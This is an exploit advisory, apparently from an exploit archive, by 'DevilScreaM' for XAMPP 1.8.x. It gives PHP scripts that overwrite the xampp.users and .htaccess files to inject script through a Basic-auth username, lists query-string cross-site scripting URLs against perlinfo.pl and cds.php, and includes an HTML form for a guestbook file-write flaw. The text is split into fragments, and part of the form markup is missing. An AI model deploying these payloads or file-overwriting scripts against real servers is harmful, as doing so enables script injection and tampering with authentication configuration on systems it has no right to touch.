#Exploit Name : XAMPP 1.8.x Multiple Vulnerabilities
#Author : DevilScreaM
#
Date
: 6 October 2014
#Vendor : http:
//bitnami.com
#Version : 1.8.x
or
Higher Version
#Operating System : Windows / Linux
#Vulnerability : Cross Site Scripting / Write File
#Type : #WebApps #Application
#Tested : Windows 7 64 Bit
#Thanks : Newbie-Security, Indonesian Hacker Team, Indonesia Coder Team, Indonesia Security Team
Cross Site Scripting at perlinfo.pl #1
Perl Version : 5.16.3
Script For Exploit
For Localhost
<?php
$xss
=
"<script>alert('Tested by DevilScreaM')</script>:"
;
$f
=@
fopen
(
'C:\xampp\security\xampp.users'
,
'w'
);
fwrite(
$f
,
$xss
);
$htcs
= 'AuthName
"Username = your Script XSS"
AuthType Basic
AuthUserFile
"C:\xampp\security\xampp.users"
require
valid-user';
$f1
=@
fopen
(
'C:\xampp\htdocs\xampp\.htaccess'
,
'w'
);
fwrite(
$f1
,
$htcs
);
?>
<script>
window.location =
"http://127.0.0.1/xampp/perlinfo.pl"
</script>
==================================================================
For Site
<?php
$xss
=
"<script>alert('Tested by DevilScreaM')</script>:"
;
$f
=@
fopen
(
'my.users'
,
'w'
);
fwrite(
$f
,
$xss
);
$htcs
= 'AuthName
"Username = your Script XSS"
AuthType Basic
AuthUserFile
"my.users"
require
valid-user';
$f1
=@
fopen
(
'.htaccess'
,
'w'
);
fwrite(
$f1
,
$htcs
);
$pl
= '#!
"perl\bin\perl.exe"
use
HTML::Perlinfo;
use
CGI qw(header);
$q
=
new
CGI;
print
$q
->header;
$p
=
new
HTML::Perlinfo;
$p
->info_general;
$p
->info_variables;
$p
->info_modules;
$p
->info_license;';
$f2
=@
fopen
(
'perlinfo.pl'
,
'w'
);
fwrite(f2 ,
$pl
);
?>
<script>
window.location =
"http://site.com/perlinfo.pl"
</script>
==================================================================
Save Script C:\xampp\htdocs\xss.php
Open Browser
and
Running http:
//127.0.0.1/xss.php
You Will Redirect to http:
//127.0.0.1/xampp/perlinfo.pl
Auth Login
Username : <script>alert(
'Tested by DevilScreaM'
)</script>
Password :
===================================================================
Cross Site Scripting at perlinfo.pl Query String #2
Exploit :
http:
//127.0.0.1/xampp/perlinfo.pl?[XSS]
http:
//127.0.0.1/xampp/perlinfo.pl?[XSS]=[XSS]
Example
http:
//127.0.0.1/xampp/perlinfo.pl?<script>alert('DevilScreaM')</script>=<script>alert('Newbie-Security')</script>
====================================================================
Cross Site Scripting at http:
//127.0.0.1/xampp/perlinfo.pl #3
Exploit :
1. Go To Directory C:\xampp\apache\conf\
2. Edit File httpd.conf
3. Go To Line 209
Edit ServerAdmin postmaster@localhost to
ServerAdmin [YOUR XSS]
Example :
ServerAdmin <h1>DevilScreaM</h1>
4. Save File
5. See your XSS at
http:
//127.0.0.1/xampp/perlinfo.pl
====================================================================
Cross Site Scripting at http:
//127.0.0.1/Webalizer/
Script
for
Exploit :
<?php
$xss
=
"<script>alert('Tested by DevilScreaM')</script>:"
;
$f
=@
fopen
(
'C:\xampp\security\xampp.users'
,
'w'
);
fwrite(
$f
,
$xss
);
?>
<script>
window.location =
"http://127.0.0.1/webalizer/usage_[YEARS][MONTH].html"
</script>
Information :
usage_[YEARS][MONTH].html => usage_201410.html
====================================================================
Save Script Webalizer.php
Command
@
echo
off
C:\xampp\webalizer\webalizer.exe -c C:\xampp\webalizer\webalizer.conf
PHP
<?php
$webalizer
=
"C:\xampp\webalizer\webalizer.bat"
;
system(
$webalizer
);
?>
=====================================================================
Save Script webalizer.cmd
or
webalizer_run.php
Run Webalizer.cmd
and
Waiting Process
Result
http:
//127.0.0.1/webalizer/usage_[years][month].html
Example
http:
//127.0.0.1/webalizer/usage_201410.html
==================================================================
Cross Site Scripting at cds.php
Exploit :
http:
//127.0.0.1/xampp/cds.php?interpret=[XSS]
Example :
http:
//127.0.0.1/xampp/cds.php?interpret=<script>alert('Tested by> DevilScreaM')</script>
====================================================================
Write File Vulnerability
Script to Exploit :
<table border=
'0'
cellpadding=
'0'
cellspacing=
'0'
>
<tr><td>TEXT:</td>
<td><input type=
'text'
size=
'30'
value=
'Tested by DevilScreaM'
name=
'f_name'
></td></tr>
<tr><td></td><td><input type=
'submit'
value=
'WRITE'
></td></tr>
</table></form>
</br></br>
==================================================================
Save Script with extension .html
Open Script
and
Click Write
or
Change Text
Result
http:
//127.0.0.1/xampp/guestbook.dat